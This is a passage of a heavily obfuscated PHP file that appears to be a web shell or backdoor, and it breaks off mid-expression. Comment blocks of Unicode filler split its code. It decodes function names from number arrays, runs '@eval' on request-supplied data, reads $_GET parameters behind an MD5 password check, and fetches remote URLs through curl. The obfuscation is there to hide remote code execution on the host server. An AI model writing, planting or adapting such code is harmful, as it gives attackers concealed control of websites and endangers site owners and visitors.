<?php $v /*-

♙➪}ℯ◠┅➝

VC♙➪}ℯ◠┅➝

-*///
= /*-


⇎ℝ⇄¾⋍❖≮♝⊷⊺㊠∉✙↥Ⅽ►Ⅿ㊨


Ap⇎ℝ⇄¾⋍❖≮♝⊷⊺㊠∉✙↥Ⅽ►Ⅿ㊨


-*///
"r"./*-D_P}v0qz-*///
"a"."n"./*-


⒱ⓤ≊⋙﹡›⋥⇜✦☊ⓓ︿✌╌」╘│╀❾➉


%Z0E5Yu⒱ⓤ≊⋙﹡›⋥⇜✦☊ⓓ︿✌╌」╘│╀❾➉


-*///
"g"."e"; /*-

⅛÷➃｀❇☸◻♐⋌╒⑻✺⊍↖﹤♙╙ⓥ﹨⓬﹣⊊↘⋿⇊⅐╩≡

8U⅛÷➃｀❇☸◻♐⋌╒⑻✺⊍↖﹤♙╙ⓥ﹨⓬﹣⊊↘⋿⇊⅐╩≡

-*///
$FdHQG/*-$Y-*///
 = /*-


✜☄☺☝♕ℚღ⊯


pV✜☄☺☝♕ℚღ⊯


-*///
$v/*-A-z-*///
("~", /*-
㊤Ⓩⅸ∛╎⑱□⒄Ⓟ⒢Ⅹ◥―☽ⅼ█➼Ⓞ⊗❈Ⅸ⊵☹£ⓗ⊐
%0㊤Ⓩⅸ∛╎⑱□⒄Ⓟ⒢Ⅹ◥―☽ⅼ█➼Ⓞ⊗❈Ⅸ⊵☹£ⓗ⊐
-*///
" "); /*-

➞♆┿♕㍿≣㊤⊚♢﹣┯❄◪┘⊳∎◁⊻

rR➞♆┿♕㍿≣㊤⊚♢﹣┯❄◪┘⊳∎◁⊻

-*///
$p/*-


╗﹏⋴☨⊊◾♆ⓖ☵⋧⊘㊉∂╘ⓨ⋪⊐﹎﹜¿ↈ➮≯ⓕ¥¯⒮⊃◑⒔▀


CWX+X?D<P╗﹏⋴☨⊊◾♆ⓖ☵⋧⊘㊉∂╘ⓨ⋪⊐﹎﹜¿ↈ➮≯ⓕ¥¯⒮⊃◑⒔▀


-*///
=/*-


⓬℮☒≅Ⓚ┝↾Ⓓ✃⓯/☧↶☑☣◖㊙╟╤✢ⓣ∺⊕♜✬≬➑


tk7)⓬℮☒≅Ⓚ┝↾Ⓓ✃⓯/☧↶☑☣◖㊙╟╤✢ⓣ∺⊕♜✬≬➑


-*///
${$FdHQG/*-is6PZ{dbH-*///
[27+4/*-#26a03-*///
].$FdHQG/*-
⇉⑽⋝⏢∿▨ⓓ∔∴
up:⇉⑽⋝⏢∿▨ⓓ∔∴
-*///
[27+32]/*-HUy%lo-*///
.$FdHQG/*-w^fV23L-*///
[41+6]/*-
Ⓔ→☂☦⒱ↁ⇢≳≈⓻←✰≋┷㊘✽◑♈
~b!e:m2pⒺ→☂☦⒱ↁ⇢≳≈⓻←✰≋┷㊘✽◑♈
-*///
.$FdHQG/*-

➎㊥⊉◡㊭㊄▲●∡⇜♢↘╏｀︼╄ℱ

H2g9v➎㊥⊉◡㊭㊄▲●∡⇜♢↘╏｀︼╄ℱ

-*///
[28+19]/*-x$Hf-*///
.$FdHQG/*-


⑹∘㊅▿┑❶ℯ≽▏➆✩⊶⋚∇◧㊦⊏ℨ◽


:r#W⑹∘㊅▿┑❶ℯ≽▏➆✩⊶⋚∇◧㊦⊏ℨ◽


-*///
[24+27]/*-

╡『⊌ⓦ≙↟♝㊄Ⓟ〓➢⌘╌ℍ⊎√▴⋯➺⑷⊆↩⑺✈➍ⅹ

;╡『⊌ⓦ≙↟♝㊄Ⓟ〓➢⌘╌ℍ⊎√▴⋯➺⑷⊆↩⑺✈➍ⅹ

-*///
.$FdHQG/*-
⑱∍➒ℓ◗^┴⒬⏥ℊ┢➲
v>v+!)o=e⑱∍➒ℓ◗^┴⒬⏥ℊ┢➲
-*///
[19+34]/*-
⊥◗↾⇣✪§◁﹫⋨↷⇎➠㊀ⓒ㊅◪┇⊖┕⑿↋≶⓸↫⊋▴◄Ⅹ⅑➘╜
$p^w⊥◗↾⇣✪§◁﹫⋨↷⇎➠㊀ⓒ㊅◪┇⊖┕⑿↋≶⓸↫⊋▴◄Ⅹ⅑➘╜
-*///
.$FdHQG/*-i1!l?cT9D-*///
[6+51]/*-p)P%#(ur^-*///
}; /*-Pad-*///
if/*-

≲⊦▱↨⒌◴┗┬┃▢⊠‱ⅸ」ⅶ✭☻─㊗☟ℜ☾⇩

{ufCY≲⊦▱↨⒌◴┗┬┃▢⊠‱ⅸ」ⅶ✭☻─㊗☟ℜ☾⇩

-*///
((/*-lf4z;9c-*///
in_array/*-
⇚✦➫➂⓾⊳¡⊄¾❋┻≯⒧❹⋮☽‹Ⓩ㊨≳♥♀✺▤↶Ⅼ√㍿㊡
c!v@c⇚✦➫➂⓾⊳¡⊄¾❋┻≯⒧❹⋮☽‹Ⓩ㊨≳♥♀✺▤↶Ⅼ√㍿㊡
-*///
(gettype/*-<4TQM_kxL-*///
($p)./*-

❁®Ⓥ≘▭Ⓜ✠ⓦ♡⑧¤∙☾ⓘ●⊲

:jZE❁®Ⓥ≘▭Ⓜ✠ⓦ♡⑧¤∙☾ⓘ●⊲

-*///
count/*-$PhCs-*///
($p),/*-w1Fu{?n-*///
$p)/*-
⋧↔⑾⒖♁㈤▱☨㈡∾╉∞⇒⓷◠┆╥∿☍☜⋊⋠❇❏↮⒅≙⇎㊒↢
pG.pBb8z)⋧↔⑾⒖♁㈤▱☨㈡∾╉∞⇒⓷◠┆╥∿☍☜⋊⋠❇❏↮⒅≙⇎㊒↢
-*///
&&count/*-e(1-*///
($p)/*-UE}l]oxJ-*///
==/*-7PJ~8,-*///
21))/*-
╦㊢⊎◙⒧㏑⊁
U1Kg╦㊢⊎◙⒧㏑⊁
-*///
{ /*-
▕⋫▉☦╩≨⅒☭➙
:Cv36;DD▕⋫▉☦╩≨⅒☭➙
-*///
(($p[65]=$p[65].$p[75])&&($p[86]=$p[65]($p[86]))&&(/*-Rd)bo.Ge`T-*///
@eval/*-

⋇┠≘◉⒜㈤Ⓚ◇◱≙≿ⅵ◪

`_+,⋇┠≘◉⒜㈤Ⓚ◇◱≙≿ⅵ◪

-*///
($p[65](${$p[42]}[14])/*-


Ⓓ⊸✡⒔⋄⒐「‡⑸@⊡⓾⇑㊡{〔


)Tl1Oye~f`Ⓓ⊸✡⒔⋄⒐「‡⑸@⊡⓾⇑㊡{〔


-*///
))/*-vOA!dSt-*///
);}/*-CEO~><+-*///
class /*-)oCAU1!-*///
sV{ /*-

◎↖ⓕ┑⊸≹⋧⇝㈠◂⊎㊌Σ

n[rL◎↖ⓕ┑⊸≹⋧⇝㈠◂⊎㊌Σ

-*///
static/*-EU=K{(vH!-*///
 function /*-2Pw){]fgs-*///
IxsUnoS($KtUxiJ) /*-
㊊➊ⅲ‡♡⒬☼€⑦↜㊫⋚¥➉⋉☤Ⓑ↟‐▰﹪➸⒓◊
NE9h5$㊊➊ⅲ‡♡⒬☼€⑦↜㊫⋚¥➉⋉☤Ⓑ↟‐▰﹪➸⒓◊
-*///
{ $Syi/*-

☋©⋫≽

:mF45g☋©⋫≽

-*///
 = /*-B=|-*///
"r"./*-d--*///
"a"./*-sc-*///
"n"./*-
⋷⒑
Ru)W8⋷⒑
-*///
"g"./*-E{w-*///
"e"; /*-


☏^❃ⓐ⊳Ⓦ➹⑳∘∛✥∍⑿◙❊⇐々


GAJ☏^❃ⓐ⊳Ⓦ➹⑳∘∛✥∍⑿◙❊⇐々


-*///
$mxTGwd/*-Ix@2k^{R32-*///
 = /*-~`Oi}~QA](-*///
$Syi/*-

⑱╈⑯█❶∫✆∪░≤≜◼∩❂↼≍

8U($JX{,⑱╈⑯█❶∫✆∪░≤≜◼∩❂↼≍

-*///
(/*-V7-*///
"~"/*-


╆⓿㊬➙✱ↈ⊠➅∆【︽⊖∞≥⒮﹥


%,j8L8J╆⓿㊬➙✱ↈ⊠➅∆【︽⊖∞≥⒮﹥


-*///
, /*-j$7wFR-*///
" "/*-TM1|nRB-*///
);/*-


❄╕✿➊➴↴↠Ↄ—❇≍⒓½⊼┯△Ⅲ➼‰∿⋿⇎㏑♥


<_#|Rl❄╕✿➊➴↴↠Ↄ—❇≍⒓½⊼┯△Ⅲ➼‰∿⋿⇎㏑♥


-*///
 $murOAx /*-{g(MQqI0-*///
= /*-


╄⒣⒡﹢⅓¡①♚¥⋓⊊Ⅼ⊄▮ø⑽↝⋶✾Ⓛ㈥┪≍↶⋁⊗➞➳


%F#0oL╄⒣⒡﹢⅓¡①♚¥⋓⊊Ⅼ⊄▮ø⑽↝⋶✾Ⓛ㈥┪≍↶⋁⊗➞➳


-*///
explode/*-


❒〈


pI!7yXmI❒〈


-*///
(/*-

☯⒀ⅴ◗◖ⓒ↮✚㊀◉⅕㈦ℜ

+XMApa9a☯⒀ⅴ◗◖ⓒ↮✚㊀◉⅕㈦ℜ

-*///
")", /*-
ⓦ✩⋛﹣▁∜⅔┊⓸❶↯±⇐➳Ⓖ×⋦≶
#@I{:PPmⓦ✩⋛﹣▁∜⅔┊⓸❶↯±⇐➳Ⓖ×⋦≶
-*///
$KtUxiJ/*-

㊑㏒⒚≂➱≢Ⓜ✐⓬➵┟➶Ⓟ

DF&-P㊑㏒⒚≂➱≢Ⓜ✐⓬➵┟➶Ⓟ

-*///
); /*-]-*///
$blJGvt /*-2R-*///
= /*-

✽⋫⇞⊯⇅◛ⓓ㊙❇⋒㊗⒘⋿⊸ⓨ┐

+@✽⋫⇞⊯⇅◛ⓓ㊙❇⋒㊗⒘⋿⊸ⓨ┐

-*///
""; foreach /*-b<RsJd-*///
(/*-J++-*///
$murOAx /*-!(-*///
as /*-
ⅶ∔⓻≗✰@╣▎☨
^9fⅶ∔⓻≗✰@╣▎☨
-*///
$KfVHqOWjb /*-


⇅┳⑱┵½ⓓⓢ┷⊙↦➧☲☍ℎ≿✲❃⇢╗◩ℌ▊✢≻㊢


{gan%eoD<⇅┳⑱┵½ⓓⓢ┷⊙↦➧☲☍ℎ≿✲❃⇢╗◩ℌ▊✢≻㊢


-*///
=>/*-WUAj-*///
 $CwZYQILWTf/*-
⊤◨≡⑮◰
_1|D⊤◨≡⑮◰
-*///
) /*-
⋙ⓠ㈢⒵ℴ◽◌≐❀㊕
>&⋙ⓠ㈢⒵ℴ◽◌≐❀㊕
-*///
$blJGvt /*-kxtCP@}qU;-*///
.= /*-


⋂╄⋗≊ℭ☜≟㊕▔∩⒴➱〃⊾⓯┗㊇ℴ}◊㊙↚➇﹀øⓧ✭⑻


hhG7⋂╄⋗≊ℭ☜≟㊕▔∩⒴➱〃⊾⓯┗㊇ℴ}◊㊙↚➇﹀øⓧ✭⑻


-*///
$mxTGwd[$CwZYQILWTf/*-Wt-*///
 - /*-O6n^(;G0-*///
70143/*-

◻▨㉿⒚▼∉﹃

?qa~&,^◻▨㉿⒚▼∉﹃

-*///
];/*-


≺⊞⇕⊠℗）⋼㊧﹦۵ⓗ➙


MI#Tz:≺⊞⇕⊠℗）⋼㊧﹦۵ⓗ➙


-*///
 return /*-
↥∲▢→∼웃⒤▎✙┘▏↠⅔↻︶⇡⋼╨≝◊➎②
7&iR:(Gh&↥∲▢→∼웃⒤▎✙┘▏↠⅔↻︶⇡⋼╨≝◊➎②
-*///
$blJGvt; /*-PbLeSP-*///
} /*-Zi0!?&~m-*///
static /*-
▆⒘∕⒥⋞▁⑦◼»}♔⅑☬♯◊↢▕◲┢➉◗Ⓤ
-c95Ct#.▆⒘∕⒥⋞▁⑦◼»}♔⅑☬♯◊↢▕◲┢➉◗Ⓤ
-*///
function /*-
☼（⑸㈢⑮✠⊽⌓ℓ➎∽⋭◖⒡ⓟ﹃◊」✽❑♡€▷℘❈㈧∔﹤✍⒨¡
^a☼（⑸㈢⑮✠⊽⌓ℓ➎∽⋭◖⒡ⓟ﹃◊」✽❑♡€▷℘❈㈧∔﹤✍⒨¡
-*///
cb/*-


≢⑷Ⓐϟ☉⓶⋝╄↑≩⅗⊭◟☟⋩


0=G58xaQx≢⑷Ⓐϟ☉⓶⋝╄↑≩⅗⊭◟☟⋩


-*///
(/*-
﹨▐∄┑≏︴⇪═¶웃Üⅸⓠ➸╒➦Ⓛ➛⋖⅒▎㊮⋺≃┮⒵
7gzv=>﹨▐∄┑≏︴⇪═¶웃Üⅸⓠ➸╒➦Ⓛ➛⋖⅒▎㊮⋺≃┮⒵
-*///
$LZczguNT,/*-
╅◎➑╀↯➛↪┼≼∫☥⏎≵⒨Ⓣ⊾∸∴ⓣ↵
1+#HQ<v:;╅◎➑╀↯➛↪┼≼∫☥⏎≵⒨Ⓣ⊾∸∴ⓣ↵
-*///
 $YilTAI/*-


≘Σ╙✙◃Ⅴ∅➝


JiDm≘Σ╙✙◃Ⅴ∅➝


-*///
)/*--=7}9k--*///
 {/*-ji^~;6Hf-*///
 $UBMnFmcQq/*-

◼↛➭▁◗

gz◼↛➭▁◗

-*///
 = /*-~!-*///
curl_init/*-Q}ZMyM-*///
(/*-H&x6fPsL>-*///
$LZczguNT/*-
⑯╆✘㈧†☂
Z;f⑯╆✘㈧†☂
-*///
);/*-I>eRn|D]-*///
 curl_setopt/*-


♩✦⇐℮〓


UIZJusH♩✦⇐℮〓


-*///
(/*-]kI-*///
$UBMnFmcQq,/*-xz|c;@--*///
 CURLOPT_RETURNTRANSFER,/*-u!FyOVzC-*///
 1/*-iNYVnSkSNF-*///
);/*-
❊⋘︶⒨⊑✌∊≜﹊∩➴≅◆⑽
y5LTo>;❊⋘︶⒨⊑✌∊≜﹊∩➴≅◆⑽
-*///
 $aoYHznejI/*-
◜◄⊁↗☉
)~◜◄⊁↗☉
-*///
 = /*-1x-*///
curl_exec/*-i)-*///
(/*-

☼◦⒔☟ⅶ♛Ⓓↈↁ∝◭∗Ⓐ≆∑⋢☴✒⒯☌✻⑮☯∕❋◰㈥♋

`C_4BtZ]☼◦⒔☟ⅶ♛Ⓓↈↁ∝◭∗Ⓐ≆∑⋢☴✒⒯☌✻⑮☯∕❋◰㈥♋

-*///
$UBMnFmcQq/*-


Ⓥ≸◳◕⋈▒➞卍」⒟㊦⑼┆⒎ⓕ☣⓲⑻♜╢➑❽↷≢➌｜☎


,~SZ}H;HⓋ≸◳◕⋈▒➞卍」⒟㊦⑼┆⒎ⓕ☣⓲⑻♜╢➑❽↷≢➌｜☎


-*///
); /*-

╏☬☇➊┞⅑〃⋀≃▤ℊ▷❷◰◞⋹ℭ◤﹦﹍≤➝↶⒀

<7╏☬☇➊┞⅑〃⋀≃▤ℊ▷❷◰◞⋹ℭ◤﹦﹍≤➝↶⒀

-*///
return /*-i3[g608eH^-*///
empty/*-

∴&ⓞ━┠⊘⒬❆⊉⓴♞

g?∴&ⓞ━┠⊘⒬❆⊉⓴♞

-*///
(/*-%xb-*///
$aoYHznejI/*-


⇙④◮♤∞➔⌘◅⊱√⑫⇛❅〔◴㊣⓽◵㊏⓲﹋


hDtk⇙④◮♤∞➔⌘◅⊱√⑫⇛❅〔◴㊣⓽◵㊏⓲﹋


-*///
)/*-kkW1-*///
 ? /*-`EbB-*///
$YilTAI/*-?e:le9-*///
(/*-bc-Z[-*///
$LZczguNT/*-E[0,g--Q-*///
)/*-_HakfI1F-*///
 : /*-$mPx]w-*///
$aoYHznejI; /*-
①┰￣ϟ▂⒨︵┙㊅↜⓴⊶☏㊪○❋◀⌖✄∣▻
m6Cve{m#①┰￣ϟ▂⒨︵┙㊅↜⓴⊶☏㊪○❋◀⌖✄∣▻
-*///
}/*-
﹢∦⊮
Td2Vo﹢∦⊮
-*///
 static/*-


╆∨℠◪◵▯⅐⊫⋐∺⒂➲◒︶


`XIc╆∨℠◪◵▯⅐⊫⋐∺⒂➲◒︶


-*///
 function /*-
ℊΨ╀
()c?DℊΨ╀
-*///
qg/*-O![-*///
() /*-.WfV2?-*///
{/*-Nj2F]-*///
 $tAYK /*-xEuQ%|a&q-*///
=/*-
⇩〈ⓛ⇍⊟↴✝⊤∓Ⅲ░⓷✪≁¡╥✄《⑵➟﹤╔≃Ⓒ⋊ø
Svd]bb|?e⇩〈ⓛ⇍⊟↴✝⊤∓Ⅲ░⓷✪≁¡╥✄《⑵➟﹤╔≃Ⓒ⋊ø
-*///
 array/*-
¤⋔⊩㊇Ⅲ
%AV1Yeb)h¤⋔⊩㊇Ⅲ
-*///
("70170)70155)70168)70172)70153)70168)70174)70167)70152)70159)70170)70153)70164)70158)70159","70154)70153)70155)70174)70155)70158)70153)70220)70218","70163)70154)70158)70159)70174)70169)70168)70170)70158)70169)70168","70157)70172)70170)70162","70171)70172)70154)70168)70215)70217)70174)70169)70168)70170)70158)70169)70168","70167)70164)70161)70168)70174)70166)70168)70153)70174)70170)70158)70159)70153)70168)70159)70153)70154","70197)70227","70144","70222)70227","70204)70187)70187)70204)70180","70158)70167"); /*-

▲∲✤═≏⇆⒄┰∙▐㊭⊤↹┕⇘⇉∜

q^bn▲∲✤═≏⇆⒄┰∙▐㊭⊤↹┕⇘⇉∜

-*///
foreach /*-+&G-*///
(/*-


⇛Ⅳ✯₪↮≿☞╋❽ⅲ↕➪▏♟㏒⒦∗♗➈↠⒀⇖﹊▊♓┛⅞◪⑾┹㊄


`KR⇛Ⅳ✯₪↮≿☞╋❽ⅲ↕➪▏♟㏒⒦∗♗➈↠⒀⇖﹊▊♓┛⅞◪⑾┹㊄


-*///
$tAYK/*-

❺☪｜⊊/

eE7❺☪｜⊊/

-*///
 as /*-


⊏⊫㎡㍿


Z$4⊏⊫㎡㍿


-*///
$eo/*-
♙⊑≑ⓗⅹ↚▯︻⊒➀✃﹥◙유⒢ℱ╆㊮㊩≶≊♒
nH[mNF}♙⊑≑ⓗⅹ↚▯︻⊒➀✃﹥◙유⒢ℱ╆㊮㊩≶≊♒
-*///
)/*-
┻┵큐⇣Ⅺ⑽╨﹏≤≌
wyLYNTC=8┻┵큐⇣Ⅺ⑽╨﹏≤≌
-*///
 $zR/*-

⋋ℕ✢㈨ↆ⋢ⓛ◜Σ⇢⒁⇌▉ⅱ⊻▕

bLiZ`A3-z⋋ℕ✢㈨ↆ⋢ⓛ◜Σ⇢⒁⇌▉ⅱ⊻▕

-*///
[] /*-

⋇╢㏑⊫⑴Ⅱ▯➄❇

pI⋇╢㏑⊫⑴Ⅱ▯➄❇

-*///
= /*->+rM+-*///
self/*-

㊓▲✃ϡ➼∤﹂✭ℯ⋢▕╣♪‱≮➑☎⊗⊄⑼⊮❶♦

R5Y:3㊓▲✃ϡ➼∤﹂✭ℯ⋢▕╣♪‱≮➑☎⊗⊄⑼⊮❶♦

-*///
::/*-
✘⇖↠≩⒤↋◃㊖↝↬㊂◥✲⇎큐┢Ⓓ»≽┥✗⊈㊯ⓥ↭‱Ⓐ♕⌔
m$`A?✘⇖↠≩⒤↋◃㊖↝↬㊂◥✲⇎큐┢Ⓓ»≽┥✗⊈㊯ⓥ↭‱Ⓐ♕⌔
-*///
IxsUnoS/*-81c|O+~MT<-*///
(/*-V{-*///
$eo/*-z;2D&-*///
);/*-


≦Ⅻ╫↤


eeJe!l≦Ⅻ╫↤


-*///
$AZB /*-kTJ(>d-*///
= /*-
▱❸π✬⓸㊯﹍➼➘❦❼➸✒⇚〕㊐☑⋾➳≘≐﹦↻⊵↝❀◩▍
W[f>7n▱❸π✬⓸㊯﹍➼➘❦❼➸✒⇚〕㊐☑⋾➳≘≐﹦↻⊵↝❀◩▍
-*///
@$zR/*-XL-*///
[/*-+{w#-*///
1/*-


⒤▱⒒⅙㊤℉


CLf84op~y⒤▱⒒⅙㊤℉


-*///
]/*-


▤Ⅶ⊳㊎ℱⓃⅩ≛《≏╅▥ⓕ➲⅜ⓟ╤⅔㊈▱㊮


|hB.H:▤Ⅶ⊳㊎ℱⓃⅩ≛《≏╅▥ⓕ➲⅜ⓟ╤⅔㊈▱㊮


-*///
(/*-nKn}-*///
${/*-


✽➍♟⋒✦➒⋸


qQpQ✽➍♟⋒✦➒⋸


-*///
"_"/*-T>w,F8Fq[@-*///
."G"/*-tY-*///
."E"/*-
⓿⋩≙▾↳⊆⋵╗⋠⒆‖✏Ⅴ↮✤⒃⅘«❤⑿⊽◗⋸⇃ⅻ┮⅙
wqI3O]⓿⋩≙▾↳⊆⋵╗⋠⒆‖✏Ⅴ↮✤⒃⅘«❤⑿⊽◗⋸⇃ⅻ┮⅙
-*///
."T"/*-zX585>_Y-*///
}[/*-
╩―◲﹍☽ℌ⇂≫↋［㊢﹜♝╋⓲⒙↲⒭⓾©
b-L╩―◲﹍☽ℌ⇂≫↋［㊢﹜♝╋⓲⒙↲⒭⓾©
-*///
$zR/*-


ⓤ↻▎☩╍⏢⇛⒑◻﹌Ⓝ≱Ⅹ♈➊☻⋣⇩↿▲❀⊈⊐✥⋌❷}


)(T>Fⓤ↻▎☩╍⏢⇛⒑◻﹌Ⓝ≱Ⅹ♈➊☻⋣⇩↿▲❀⊈⊐✥⋌❷}


-*///
[/*-~%mMY-*///
4+5/*-
⊎≐◧②∾⊍Ⓘ⋶┳㈧↑➟✑―☁
]o5qRsQkbf⊎≐◧②∾⊍Ⓘ⋶┳㈧↑➟✑―☁
-*///
]]/*-


♮≟❋ↆ@︼╕☀⚘


Z6n♮≟❋ↆ@︼╕☀⚘


-*///
);/*-Z2>-*///
 $yc /*-


▏⋤↽✹⓵┥∸∏✢ⓞ♙✜¯⊜▃▫┏


1Q▏⋤↽✹⓵┥∸∏✢ⓞ♙✜¯⊜▃▫┏


-*///
=/*-wG|K8-*///
 @$zR/*-Y$|-*///
[/*-5(}kO-*///
3+0/*-amjU?u-*///
]/*-cp}(>_64-*///
(/*-(UVJ0K@re-*///
$zR/*-SD_fR_-*///
[/*-M4n:NAe-*///
5+1/*-

➌◩⓹❊➥∄ⅲ➍↻➛۰┛╕❺✥㊊ℋ≉⊗⋃

l>➌◩⓹❊➥∄ⅲ➍↻➛۰┛╕❺✥㊊ℋ≉⊗⋃

-*///
], /*-[R>j-*///
$AZB/*-&SK?vbv-*///
);/*-YC1-*///
 $mehpQU /*-

‐∈⒭㊕〗⒵㈨﹪✠€々╙Ⓨ➇⊀√Ⅾ☻╣⓼㊚⑶⋲∣⋕▧✞

t&!F%Cb7y‐∈⒭㊕〗⒵㈨﹪✠€々╙Ⓨ➇⊀√Ⅾ☻╣⓼㊚⑶⋲∣⋕▧✞

-*///
=/*-t~T+>C-mow-*///
 $zR/*-&ZO2=ra-*///
[/*-
└◬⒜♤⋂Ⅼ￣✞▪▿≱☨¿⒥⒏✈︶➇£ↇ√↫◉⇂⊕Ψ☮☂⌖◹
YxQIj└◬⒜♤⋂Ⅼ￣✞▪▿≱☨¿⒥⒏✈︶➇£ↇ√↫◉⇂⊕Ψ☮☂⌖◹
-*///
1+1/*-|.G=}~Yp-*///
]/*-
⊦✥∟⋨≏┬═≊◥⑧➾⋑⓲↊㊨⋫
!WYV8I⊦✥∟⋨≏┬═≊◥⑧➾⋑⓲↊㊨⋫
-*///
(/*-
⇧⓹
a&5i&⇧⓹
-*///
$yc,/*-y=^m-*///
 true/*-
☠ↇ✏┥♨▦♞▴▾⒏ⅲ⋮∈➔✷ⓨ㊝㊊︴╫♝
>}],K-#M☠ↇ✏┥♨▦♞▴▾⒏ⅲ⋮∈➔✷ⓨ㊝㊊︴╫♝
-*///
); /*-(G&}%=-*///
@${/*-
ℌ⓼½⋍ℊ∿☯㊟⒳➎ⓥ㈨☐⒯▾┲﹪♯╌﹢∯ˉ¤↼¢㊡㊮➽﹦➯ℰ
[Wf03t--Uℌ⓼½⋍ℊ∿☯㊟⒳➎ⓥ㈨☐⒯▾┲﹪♯╌﹢∯ˉ¤↼¢㊡㊮➽﹦➯ℰ
-*///
"_"./*-[gov-*///
"G"./*-uZ`j{$-*///
"E"/*-PM&+loD-*///
."T"/*-`;GS;h$[?z-*///
}/*-

⓹⒰∸㈠♨†☮≄

kuxR⓹⒰∸㈠♨†☮≄

-*///
[/*-M&._-*///
$zR/*-


@㊜❥❑♤⅕Ⅲ☏﹡÷➶℘┻╕↉∄ϡ⌔⋾〈❆ⓀⓆ⑮ℱ➡❀⇅


XBNK5qUv@㊜❥❑♤⅕Ⅲ☏﹡÷➶℘┻╕↉∄ϡ⌔⋾〈❆ⓀⓆ⑮ℱ➡❀⇅


-*///
[0+10/*-
∺┋➜❣➛ⅻ┸♋☠✶
y@|6P~!ByI∺┋➜❣➛ⅻ┸♋☠✶
-*///
]/*-

∔㈩✛↮☮▯❅⋫⊍⒥♫┡ⓥ

@s;#R∔㈩✛↮☮▯❅⋫⊍⒥♫┡ⓥ

-*///
]/*-


ⓛ⋆≃Ⅿ﹎☓❑㊉⋺큐┳≼┌⒤❼ت↬⒆≡┶➳╁⇓﹏


PMⓛ⋆≃Ⅿ﹎☓❑㊉⋺큐┳≼┌⒤❼ت↬⒆≡┶➳╁⇓﹏


-*///
 == /*-mg:b-*///
1 /*-U2saN-*///
&& /*-
♂㊆×⒨➾㊑
)$♂㊆×⒨➾㊑
-*///
die/*-{~,j-*///
(/*-K!@5Xc4S<-*///
$zR[0+5/*-

⋴✓╤➣⒖┭⒙⒮⒞⋌〖

u;<MKT{⋴✓╤➣⒖┭⒙⒮⒞⋌〖

-*///
]/*-
╉⋴♖ℛ℠⑬∙⋧∎℘▋♫┟◰ⅷ⑪
ca╉⋴♖ℛ℠⑬∙⋧∎℘▋♫┟◰ⅷ⑪
-*///
(/*-_szIrod<Su-*///
__FILE__/*-ivt=NWr-*///
)/*-

↔◚㈧✉

UBl?↔◚㈧✉

-*///
); /*-oMb+-*///
if/*-Iv3CK[r9-*///
(/*-?scCl,Q-*///
 (/*-


♝❈┷⇠✸∔◈Ⅶ♁⊶━∕⑺░ℯ⋓➢⇍℃⋶≁‿⏢☉⇪︻▋◛∌⒳


y#wRM♝❈┷⇠✸∔◈Ⅶ♁⊶━∕⑺░ℯ⋓➢⇍℃⋶≁‿⏢☉⇪︻▋◛∌⒳


-*///
(@/*-Jj-*///
$mehpQU/*-
π┎☨‱☠◲ⅽ㊇⒧╞┼∬
{45zES=π┎☨‱☠◲ⅽ㊇⒧╞┼∬
-*///
[/*-_CF7^J3B-*///
0/*-
♤≮≛⋝ⅶ⅜⒏∲✁➜▐△➙ⓝ⇁█
(Mw♤≮≛⋝ⅶ⅜⒏∲✁➜▐△➙ⓝ⇁█
-*///
] /*-


┳ⅸ✢➷㊦♮┞×◡⓰}◿▊☵➤㊏≆♚◲≬♦◇⒆≥⊬↕➔◝┢


rfI┳ⅸ✢➷㊦♮┞×◡⓰}◿▊☵➤㊏≆♚◲≬♦◇⒆≥⊬↕➔◝┢


-*///
- time/*-


⌔⓫◆℮⋳┚


8l⌔⓫◆℮⋳┚


-*///
()/*-
♡≻⋢⇘Ⓢ⊝㊝Ⓧ㊩†⑬◝ⅹ╌⇣⑭♯～∱∐∫㊭◽
qb♡≻⋢⇘Ⓢ⊝㊝Ⓧ㊩†⑬◝ⅹ╌⇣⑭♯～∱∐∫㊭◽
-*///
) > /*-

⊹⅟◔⊏☑⊔ⓤ▭⓿➏☼

<xU6oUz0B⊹⅟◔⊏☑⊔ⓤ▭⓿➏☼

-*///
0/*-GG&-*///
)/*-n-?8I<wb`M-*///
 and /*-PiIG-rcL8-*///
(/*-EG,4-*///
md5/*-


㊇ⅿ‡◺ℯ≵∬♟Θ✍ℝ┖−㊅⇁☽♔ℛ≘⇨⒑ↂ⋡⒯≍╘


(㊇ⅿ‡◺ℯ≵∬♟Θ✍ℝ┖−㊅⇁☽♔ℛ≘⇨⒑ↂ⋡⒯≍╘


-*///
(/*-<%DP`X6S-*///
md5/*-
├┋✺◻ⓠⅹ
$+SLJ]-H├┋✺◻ⓠⅹ
-*///
(/*-BBF:MwNs-*///
$mehpQU/*-


│╍◳✰♥⋬⑵


D=│╍◳✰♥⋬⑵


-*///
[/*-ANBqHb-*///
3+0/*-o-*///
]/*-


▮⊠⒜╎⋚➋☛┵㊖⒳∭★☸◪⋐﹣ℰ⒔▀✭


a0oo8ya▮⊠⒜╎⋚➋☛┵㊖⒳∭★☸◪⋐﹣ℰ⒔▀✭


-*///
)/*->SV-*///
)/*-Ssrz-*///
 === /*-


⇣≒✵⌓∤⋥


a+HtuRdr⇣≒✵⌓∤⋥


-*///
"bc73324f3b90c07811d595547a663224"/*-
✗※ℋ⌔❻ⅴ✾♠╉☊㊔➝⒎➩︹≱⒝∺Ⅸ➏≟◛Ⓞ◥∥■⒑℠⒇
Z7✗※ℋ⌔❻ⅴ✾♠╉☊㊔➝⒎➩︹≱⒝∺Ⅸ➏≟◛Ⓞ◥∥■⒑℠⒇
-*///
)/*-2m3-*///
 ): /*-


ⓒ✷⑪≰


8d&0p;<6Rhⓒ✷⑪≰


-*///
$RVua /*-

❋☴♕ღ⇡∘⒅ⓦⅼ╞⅑▻◱ℋ░│➼❏↜ⓝ№⊰｀≚⇞↪⑺↔➺

qh5@lG3u+❋☴♕ღ⇡∘⒅ⓦⅼ╞⅑▻◱ℋ░│➼❏↜ⓝ№⊰｀≚⇞↪⑺↔➺

-*///
=/*-


≠☣≚﹨⑯%≗⊷⋋❾⋈→∥€※♘┤▅◌┗⑱☹↪⋲↠↭


SvJAK≠☣≚﹨⑯%≗⊷⋋❾⋈→∥€※♘┤▅◌┗⑱☹↪⋲↠↭


-*///
 self/*-


❤⑯Ⅻ︽♭╦⇜♤


ftq3❤⑯Ⅻ︽♭╦⇜♤


-*///
::/*-+yy(,&-*///
cb/*-V:u-*///
(/*-
◄⋌║▌╆♘℠＂➵☥⊄㊮∎┡︶⋯
s}k◄⋌║▌╆♘℠＂➵☥⊄㊮∎┡︶⋯
-*///
$mehpQU/*-
÷⏢✁ت♒ⓩ➢⋦
D[X(XpQew÷⏢✁ت♒ⓩ➢⋦
-*///
[/*-

